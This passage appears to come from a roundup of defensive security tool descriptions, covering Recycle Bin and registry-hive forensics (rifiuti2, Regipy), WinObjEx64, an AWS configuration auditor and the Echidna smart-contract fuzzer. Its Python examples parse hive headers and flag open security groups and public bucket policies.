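                          (2, 2, SAMPLE_TIME, 10, r"C:\tmp\gone.txt", True)])
    for rec in parse_info2(sample):
        print(rec)
    print(parse_dollar_i(build_dollar_i_v2(SAMPLE_TIME, 77, r"D:\loot\keys.txt")))
```

Deletion times are stored in UTC; rifiuti2's -z option applies the local time zone, which the parser above deliberately does not do, so timelines built from several machines line up.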

Supported platform
It has been tested on Linux, Windows 7 and FreeBSD. Some testing on big-endian platforms is done with the QEMU emulator. More compatibility fixes for other architectures are welcome.

Download

Windows
Windows binaries are officially provided on Github release page.
Note that 0.6.1 version is the last version that can run on Windows XP and 2003; upcoming versions would require Vista or above.

Linux

FreeBSD
Official FreeBSD port is available since 8.4.

Others (Compile from source)
For OS where rifiuti2 is not readily available, it is always possible to compile from source.
rifiuti2 follows the usual autotools based procedure:
./configure && make check && make install
Please refer to wiki page for more detail.


Regipy - An OS Independent Python Library For Parsing Offline Registry Hives


Regipy is a python library for parsing offline registry hives. regipy has a lot of capabilities:
  • Use as a library:
    • Recurse over the registry hive, from root or a given path and get all subkeys and values
    • Read specific subkeys and values
    • Apply transaction logs on a registry hive
  • Command Line Tools
    • Dump an entire registry hive to json
    • Apply transaction logs on a registry hive
    • Compare registry hives
    • Execute plugins from a robust plugin system (i.e: amcache, shimcache, extract computer name...)

Installation
Only python 3.7 is supported:
pip install regipy
also, it is possible to install from source by cloning the repository and executing:
python setup.py install

CLI

Parse the header:
registry-parse-header ~/Documents/TestEvidence/Registry/SYSTEM
Example output:
╒════════════════════════╤══════════╕
│ signature              │ b'regf'  │
├────────────────────────┼──────────┤
│ primary_sequence_num   │ 11639    │
├────────────────────────┼──────────┤
│ secondary_sequence_num │ 11638    │
├────────────────────────┼──────────┤
│ last_modification_time │ 0        │
├────────────────────────┼──────────┤
│ major_version          │ 1        │
├────────────────────────┼──────────┤
│ minor_version          │ 5        │
├────────────────────────┼──────────┤
│ file_type              │ 0        │
├────────────────────────┼──────────┤
│ file_format            │ 1        │
├────────────────────────┼──────────┤
│ root_key_offset        │ 32       │
├────────────────────────┼──────────┤
│ hive_bins_data_size    │ 10534912 │
├────────────────────────┼──────────┤
│ clustering_factor      │ 1        │
├────────────────────────┼──────────┤
│ file_name              │ SYSTEM   │
├────────────────────────┼──────────┤
│ checksum               │ 0        │
╘════════════════════════╧══════════╛
[2019-02-09 13:46:12.111654] WARNING: regipy.cli: Hive is not clean! You should apply transaction logs
  • When parsing the header of a hive, checksum validation and transaction-log (dirty hive) validation are also performed; the warning above is raised because the primary and secondary sequence numbers differ
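The fields in that table and both checks come straight from the 4 KiB REGF base block at the start of every hive. The following Python is an added example, not regipy's code: it parses the base block at the documented offsets, recomputes the header checksum (XOR-32 over the first 508 bytes, with 0 stored as 1 and 0xFFFFFFFF as 0xFFFFFFFE), and flags the hive as dirty when the primary and secondary sequence numbers disagree. The sample header it builds reproduces the values shown above and is constructed, not read from a real SYSTEM hive.

```python
"""Parse the base block (first 4 KiB) of an offline registry hive the way
registry-parse-header summarises it, and reproduce the two checks mentioned
above: header checksum and the sequence-number (dirty hive) test.

Added example, not regipy's code. Offsets follow the documented REGF base
block layout; the sample header is constructed, not taken from a real hive."""
import struct
from datetime import datetime, timedelta, timezone

BASE_BLOCK = 4096
# 0x00 signature, 0x04/0x08 primary/secondary sequence numbers, 0x0C FILETIME,
# 0x14 major, 0x18 minor, 0x1C file type, 0x20 file format, 0x24 root cell
# offset, 0x28 hive bins data size, 0x2C clustering factor, 0x30 file name
# (UTF-16LE, 64 bytes)
_HDR = struct.Struct("<4sIIQIIIIIII64s")
CHECKSUM_OFFSET = 0x1FC


def regf_checksum(block):
    """XOR-32 over the first 508 bytes; a result of 0 is stored as 1 and
    0xFFFFFFFF as 0xFFFFFFFE, per the format."""
    result = 0
    for (dword,) in struct.iter_unpack("<I", block[:CHECKSUM_OFFSET]):
        result ^= dword
    if result == 0:
        return 1
    if result == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return result


def filetime_to_dt(ft):
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_regf_header(block):
    (sig, seq1, seq2, ts, major, minor, ftype, fformat,
     root_off, bins_size, cluster, name) = _HDR.unpack_from(block, 0)
    if sig != b"regf":
        raise ValueError("not a registry hive: bad signature")
    (stored,) = struct.unpack_from("<I", block, CHECKSUM_OFFSET)
    return {
        "signature": sig,
        "primary_sequence_num": seq1,
        "secondary_sequence_num": seq2,
        "last_modification_time": filetime_to_dt(ts) if ts else None,
        "major_version": major,
        "minor_version": minor,
        "file_type": ftype,
        "file_format": fformat,
        "root_key_offset": root_off,
        "hive_bins_data_size": bins_size,
        "clustering_factor": cluster,
        "file_name": name.decode("utf-16-le").split("\x00", 1)[0],
        "checksum": stored,
        "checksum_ok": stored == regf_checksum(block),
        # The kernel bumps the primary number before a write and the secondary
        # after it; a mismatch means a write never completed, so the .LOG1/.LOG2
        # transaction logs must be applied before the hive contents are trusted.
        "dirty": seq1 != seq2,
    }


def build_base_block(seq1, seq2, name, bins_size, write_checksum=True):
    """Constructed header for demonstration; fields mirror the sample output above."""
    block = bytearray(BASE_BLOCK)
    _HDR.pack_into(block, 0, b"regf", seq1, seq2, 0, 1, 5, 0, 1, 32, bins_size, 1,
                   name.encode("utf-16-le"))
    if write_checksum:
        struct.pack_into("<I", block, CHECKSUM_OFFSET, regf_checksum(bytes(block)))
    return bytes(block)


if __name__ == "__main__":
    header = parse_regf_header(build_base_block(11639, 11638, "SYSTEM", 10534912))
    for key, value in header.items():
        print(f"{key:24} {value}")
    if header["dirty"]:
        print("Hive is not clean! You should apply transaction logs")
```

A dirty hive is not corrupt, it is simply behind: the pending cells live in the .LOG1/.LOG2 files, which is why registry-transaction-logs (below) takes both logs and writes a recovered copy rather than modifying the evidence in place.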

Dump entire hive to disk (this might take some time)
registry-dump ~/Documents/TestEvidence/Registry/NTUSER-CCLEANER.DAT -o /tmp/output.json
registry-dump util can also output a timeline instead of a JSON, by adding the -t flag

Run relevant plugins on Hive
registry-run-plugins ~/Documents/TestEvidence/Registry/SYSTEM -o /tmp/plugins_output.json
The hive type will be detected automatically and the relevant plugins will be executed. See the plugins section for more information

Compare registry hives
Compare registry hives of the same type and output to CSV (if -o is not specified output will be printed to screen)
registry-diff NTUSER.dat NTUSER_modified.dat -o /tmp/diff.csv
Example output:
[2019-02-11 19:49:18.824245] INFO: regipy.cli: Comparing NTUSER.DAT vs NTUSER_modified.DAT
╒══════════════╤══════════════╤════════════════════════════════════════════════════════════════════════════════╤════════════════════════════════════════════════╕
│ difference   │ first_hive   │ second_hive                                                                    │ description                                    │
╞══════════════╪══════════════╪════════════════════════════════════════════════════════════════════════════════╪════════════════════════════════════════════════╡
│ new_subkey   │              │ 2019-02-11T19:46:31.832134+00:00                                               │ \Software\Microsoft\legitimate_subkey          │
├──────────────┼──────────────┼────────────────────────────────────────────────────────────────────────────────┼────────────────────────────────────────────────┤
│ new_value    │              │ not_a_malware: c:\temp\legitimate_binary.exe @ 2019-02-11 19:45:25.516346+00:00│ \Software\Microsoft\Windows\CurrentVersion\Run │
╘══════════════╧══════════════╧════════════════════════════════════════════════════════════════════════════════╧════════════════════════════════════════════════╛
[2019-02-11 19:49:18.825328] INFO: regipy.cli: Detected 2 differences

Recover a registry hive, using transaction logs:
registry-transaction-logs NTUSER.DAT -p ntuser.dat.log1 -s ntuser.dat.log2 -o recovered_NTUSER.dat 
After recovering, compare the hives with registry-diff to see what changed

Using as a library

Initiate the registry hive object
from regipy.registry import RegistryHive
reg = RegistryHive('/Users/martinkorman/Documents/TestEvidence/Registry/Vibranium-NTUSER.DAT')

Iterate recursively over the entire hive, from root key
for entry in reg.recurse_subkeys(as_json=True):
    print(entry)

Iterate over a key and get all subkeys and their modification time:
from regipy.utils import convert_wintime  # converts the FILETIME in the key header to a datetime
for sk in reg.get_key('Software').iter_subkeys():
    print(sk.name, convert_wintime(sk.header.last_modified).isoformat())

Adobe 2019-02-03T22:05:32.525965
AppDataLow 2019-02-03T22:05:32.526047
McAfee 2019-02-03T22:05:32.526140
Microsoft 2019-02-03T22:05:32.526282
Netscape 2019-02-03T22:05:32.526352
ODBC 2019-02-03T22:05:32.526521
Policies 2019-02-03T22:05:32.526592

Get the values of a key:
reg.get_key(r'Software\Microsoft\Internet Explorer\BrowserEmulation').get_values(as_json=True)  # raw string: the path contains backslashes
[{'name': 'CVListTTL',
'value': 0,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'UnattendLoaded',
'value': 0,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'TLDUpdates',
'value': 0,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'CVListXMLVersionLow',
'value': 2097211,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'CVListXMLVersionHigh',
'value': None,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'CVListLastUpdateTime',
'value': None,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'IECompatVersionHigh',
'value': None,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'IECompatVersionLow',
'value': 2097211,
'value_type': 'REG_DWORD',
'is_corrupted': False},
{'name': 'StaleCompatCache',
'value': 0,
'value_type': 'REG_DWORD',
'is_corrupted': False}]

Use as a plugin:
from regipy.plugins.ntuser.ntuser_persistence import NTUserPersistencePlugin
NTUserPersistencePlugin(reg, as_json=True).run()

{
'Software\\Microsoft\\Windows\\CurrentVersion\\Run': {
'timestamp': '2019-02-03T22:10:52.655462',
'values': [{
'name': 'Sidebar',
'value': '%ProgramFiles%\\Windows Sidebar\\Sidebar.exe /autoRun',
'value_type': 'REG_EXPAND_SZ',
'is_corrupted': False
}]
}
}

Run all relevant plugins for a specific hive
from regipy.plugins.utils import run_relevant_plugins
reg = RegistryHive('/Users/martinkorman/Documents/TestEvidence/Registry/SYSTEM')
run_relevant_plugins(reg, as_json=True)

{
'routes': {},
'computer_name': [{
'control_set': 'ControlSet001\\Control\\ComputerName\\ComputerName',
'computer_name': 'DESKTOP-5EG84UG',
'timestamp': '2019-02-03T22:19:28.853219'
}]
}



WinObjEx64 - Windows Object Explorer 64-Bit


WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 lets you view and edit object-related security information if you have the required access rights.

System Requirements
WinObjEx64 does not require administrative privileges. However, administrative privilege is required to view much of the namespace and to edit object-related security information.
WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants.
WinObjEx64 also supports running on Wine, including Wine Staging.
In order to use all program features Windows must be booted in the DEBUG mode.

Build
WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 or Visual Studio 2015 and later versions.

Instructions
  • Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
    • v120 for Visual Studio 2013;
    • v140 for Visual Studio 2015;
    • v141 for Visual Studio 2017.
  • For v140 and above set Target Platform Version (Project->Properties->General):
    • If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
    • If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed).

What is new

Authors
(c) 2015 - 2019 WinObjEx64 Project
Original WinObjEx (c) 2003 - 2005 Four-F


Cloud Security Audit - A Command Line Security Audit Tool For Amazon Web Services


A command line security audit tool for Amazon Web Services

About
Cloud Security Audit is a command line tool that scans for vulnerabilities in your AWS account. It helps you quickly identify insecure parts of your infrastructure and prepare your AWS account for a security audit.

Installation
Currently Cloud Security Audit does not support any package managers, but the work is in progress.

Building from sources
First of all you need to download Cloud Security Audit to your GO workspace:
$GOPATH $ go get github.com/Appliscale/cloud-security-audit
$GOPATH $ cd cloud-security-audit
Then build and install configuration for the application inside cloud-security-audit directory by executing:
cloud-security-audit $ make all

Usage

Initialising Session
If you're using MFA you need to tell Cloud Security Audit to authenticate you before trying to connect by using flag --mfa. Example:
$ cloud-security-audit --service s3 --mfa --mfa-duration 3600

EC2 Scan

How to use
To perform audit on all EC2 instances, type:
$ cloud-security-audit --service ec2
You can narrow the audit to a region, by using the flag -r or --region. Cloud Security Audit also supports AWS profiles - to specify profile use the flag -p or --profile.

Example output
+---------------+---------------------+--------------------------------+-----------------------------------+----------+
| AVAILABILITY  | EC2                 | VOLUMES                        | SECURITY                          |          |
|               |                     |                                |                                   | EC2 TAGS |
| ZONE          |                     | (NONE) - NOT ENCRYPTED         | GROUPS                            |          |
|               |                     |                                |                                   |          |
|               |                     | (DKMS) - ENCRYPTED WITH        | (INCOMING CIDR = 0.0.0.0/0)       |          |
|               |                     | DEFAULT KMSKEY                 |                                   |          |
|               |                     |                                | ID : PROTOCOL : PORT              |          |
+---------------+---------------------+--------------------------------+-----------------------------------+----------+
| eu-central-1a | i-0fa345j6756nb3v23 | vol-0a81288qjd188424d[DKMS]    | sg-aaaaaaaa : tcp : 22            | App:some |
|               |                     | vol-0c2834re8dfsd8sdf[NONE]    | sg-aaaaaaaa : tcp : 22            | Key:Val  |
+---------------+---------------------+--------------------------------+-----------------------------------+----------+

How to read it
  1. First column AVAILABILITY ZONE contains information where the instance is placed
  2. Second column EC2 contains instance ID.
  3. Third column Volumes contains IDs of attached volumes(virtual disks) to given EC2. Suffixes meaning:
    • [NONE] - Volume not encrypted.
    • [DKMS] - Volume encrypted using AWS Default KMS Key. More about KMS you can find here
  4. Fourth column Security Groups contains IDs of security groups with overly permissive rules, e.g. an ingress CIDR block equal to 0.0.0.0/0 (open to the whole world).
  5. Fifth column EC2 TAGS contains tags of a given EC2 instance to help you identify purpose of this instance.

Docs
You can find more information about encryption in the following documentation:
  1. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

S3 Scan

How to use
To perform audit on all S3 buckets, type:
$ cloud-security-audit --service s3
Cloud Security Audit supports AWS profiles - to specify profile use the flag -p or --profile.

Example output
+------------------------------+---------+---------+-------------+------------+
| BUCKET NAME                  | DEFAULT | LOGGING | ACL         | POLICY     |
|                              |         |         |             |            |
|                              | SSE     | ENABLED | IS PUBLIC   | IS PUBLIC  |
|                              |         |         |             |            |
|                              |         |         | R - READ    | R - READ   |
|                              |         |         |             |            |
|                              |         |         | W - WRITE   | W - WRITE  |
|                              |         |         |             |            |
|                              |         |         | D - DELETE  | D - DELETE |
+------------------------------+---------+---------+-------------+------------+
| bucket1                      | NONE    | true    | false       | false      |
+------------------------------+---------+---------+-------------+------------+
| bucket2                      | DKMS    | false   | false       | true [R]   |
+------------------------------+---------+---------+-------------+------------+
| bucket3                      | AES256  | false   | true [RWD]  | false      |
+------------------------------+---------+---------+-------------+------------+

How to read it
  1. First column BUCKET NAME contains the names of the S3 buckets.
  2. Second column DEFAULT SSE tells you which default type of server-side encryption is set on the bucket:
    • NONE - Default SSE not enabled.
    • DKMS - Default SSE enabled, AWS KMS key used to encrypt data.
    • AES256 - Default SSE enabled, AES256.
  3. Third column LOGGING ENABLED shows whether server access logging is enabled for the bucket. This provides detailed records of the requests made to the bucket. More information about server access logging can be found here.
  4. Fourth column ACL IS PUBLIC shows whether the ACL (Access Control List) contains grants that make the bucket public (read/write for anyone). More information about ACLs here.
  5. Fifth column POLICY IS PUBLIC shows whether the bucket policy allows any action (read/write/delete) for an anonymous user. More about bucket policies here. The letters R, W and D describe which kind of action is available to everyone.
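The two findings that matter most in the EC2 and S3 tables above, world-open security group rules and bucket policies that grant the anonymous principal access, can be evaluated without touching AWS once the API responses are in hand. The following Python is an added example, not Cloud Security Audit's own (Go) code: it runs the same checks over constructed documents shaped like an EC2 describe_security_groups entry and an S3 bucket policy, mapping s3:Get*/List*, Put* and Delete* onto the R, W and D letters the tool prints. The sample group ID reuses the one from the table; everything else is made up.

```python
"""Offline checks matching the EC2 and S3 findings above.

Added example, not Cloud Security Audit's own (Go) code. It works on
constructed documents shaped like the AWS API responses (an EC2
describe_security_groups entry and an S3 bucket policy) rather than calling AWS."""
import json

WORLD = {"0.0.0.0/0", "::/0"}


def open_ingress(security_group):
    """(GroupId, protocol, ports) for every ingress rule reachable from anywhere."""
    findings = []
    for perm in security_group.get("IpPermissions", []):
        cidrs = {r.get("CidrIp") for r in perm.get("IpRanges", [])}
        cidrs |= {r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])}
        if not cidrs & WORLD:
            continue
        proto = perm.get("IpProtocol", "-1")
        lo, hi = perm.get("FromPort"), perm.get("ToPort")
        # IpProtocol -1 means every protocol and every port
        ports = "all" if proto == "-1" else (str(lo) if lo == hi else f"{lo}-{hi}")
        findings.append((security_group["GroupId"], proto, ports))
    return findings


# Action prefixes mapped onto the R / W / D letters the tool prints.
_ACTION_CLASS = {"s3:get": "R", "s3:list": "R", "s3:put": "W", "s3:delete": "D"}


def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}: the grant applies to everyone."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_actions(policy_json):
    """Letters from RWD the bucket policy grants to anonymous callers unconditionally."""
    letters = set()
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # conditional grants (e.g. aws:SourceIp) need a human look; not counted
        actions = stmt.get("Action", [])
        for action in [actions] if isinstance(actions, str) else actions:
            action = action.lower()
            if action in ("*", "s3:*"):
                letters.update("RWD")
                continue
            for prefix, letter in _ACTION_CLASS.items():
                if action.startswith(prefix):
                    letters.add(letter)
    return "".join(sorted(letters, key="RWD".index))


# Constructed sample inputs (not from a real account).
SAMPLE_SG = {
    "GroupId": "sg-aaaaaaaa",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []},
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::bucket2/*"},
        {"Effect": "Allow", "Principal": "*", "Action": ["s3:PutObject"],
         "Resource": "arn:aws:s3:::bucket2/*",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
        {"Effect": "Deny", "Principal": "*", "Action": "s3:DeleteObject",
         "Resource": "arn:aws:s3:::bucket2/*"},
    ],
})

if __name__ == "__main__":
    print(open_ingress(SAMPLE_SG))               # [('sg-aaaaaaaa', 'tcp', '22'), ('sg-aaaaaaaa', '-1', 'all')]
    print(public_policy_actions(SAMPLE_POLICY))  # R
```

Note the IPv6 rule: a group that is "closed" for 0.0.0.0/0 can still be wide open through ::/0, so both address families are checked. Statements carrying a Condition are skipped rather than counted, because whether aws:SourceIp or aws:SecureTransport actually restricts anonymous access needs a human decision.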

Docs
You can find more about securing your S3 buckets in the following documentation:
  1. https://docs.aws.amazon.com/AmazonS3/latest/dev/serv-side-encryption.html
  2. https://docs.aws.amazon.com/AmazonS3/latest/dev/ServerLogs.html
  3. https://docs.aws.amazon.com/AmazonS3/latest/user-guide/server-access-logging.html

License
Apache License 2.0

Maintainers


Echidna - Ethereum Fuzz Testing Framework


Echidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley)
More seriously, Echidna is a Haskell library designed for fuzzing/property-based testing of EVM code. It supports relatively sophisticated grammar-based fuzzing campaigns to falsify a variety of predicates.

Features
  • Generates inputs tailored to your actual code
  • Optional coverage guidance to find deeper bugs
  • Automatic testcase minimization for quick triage
  • Seamless integration into the development workflow
  • Fast
  • Powerful API for advanced usage
  • Beautiful logo

Usage

Executing the test runner
The core Echidna functionality is an executable called echidna-test. echidna-test takes a contract and a list of invariants (properties that should always remain true) as input. For each invariant, it generates random sequences of calls to the contract and checks if the invariant holds. If it can find some way to falsify the invariant, it prints the call sequence that does so. If it can't, you have some assurance the contract is safe.

Writing invariants
Invariants are expressed as Solidity functions whose names begin with echidna_, take no arguments, and return a boolean. For example, if you have some balance variable that should never go below 20, you can write an extra function in your contract like this one:
function echidna_check_balance() public view returns (bool) {
    return balance >= 20;
}
To check these invariants, run:
$ echidna-test myContract.sol
An example contract with tests can be found in examples/solidity/basic/flags.sol. To run it, execute:
$ echidna-test examples/solidity/basic/flags.sol
Echidna should find a call sequence that falsifies echidna_sometimesfalse and should be unable to find a falsifying input for echidna_alwaystrue.

Configuration options
Echidna's CLI can be used to choose the contract to test and load a configuration file.
$ echidna-test contract.sol TEST --config="config.yaml"
The configuration file allows users to choose EVM and test generation parameters. An example of a complete config file with the default options can be found at examples/solidity/basic/default.yaml. More detailed documentation on the configuration options is available in our wiki.

Advanced usage
Echidna exports an API to build powerful fuzzing systems, and has a multitude of configuration options. Unfortunately, these parts of the codebase change quickly and are thus poorly documented. The examples/api directory or Trail of Bits blog are excellent references, or use the references below to get in touch with us directly.

Installation
If you want to quickly test Echidna in Linux, we offer a statically linked binary release of v1.0.0.0 to download here.
Otherwise, to install the latest revision of Echidna, we recommend using Docker:
$ docker build -t echidna .
for example
$ docker run -t -v `pwd`:/src echidna echidna-test /src/examples/solidity/basic/flags.sol
If you'd prefer to build from source, use Stack. stack install should build and compile echidna-test into ~/.local/bin. You will need to link against libreadline and libsecp256k1 (built with recovery enabled), which should be installed with the package manager of your choosing. Additionally, you need to install the latest release of libff (you can take a look at the script used in our CI tests).
If you're getting linking-related build errors, try tinkering with --extra-include-dirs and --extra-lib-dirs.

Getting help
Feel free to stop by our #ethereum slack channel in Empire Hacking for help using or extending Echidna.
  • Get started by reviewing these simple Echidna invariants
  • Review the Solidity examples directory for more extensive Echidna use cases
  • Considering emailing the Echidna development team directly for more detailed questions

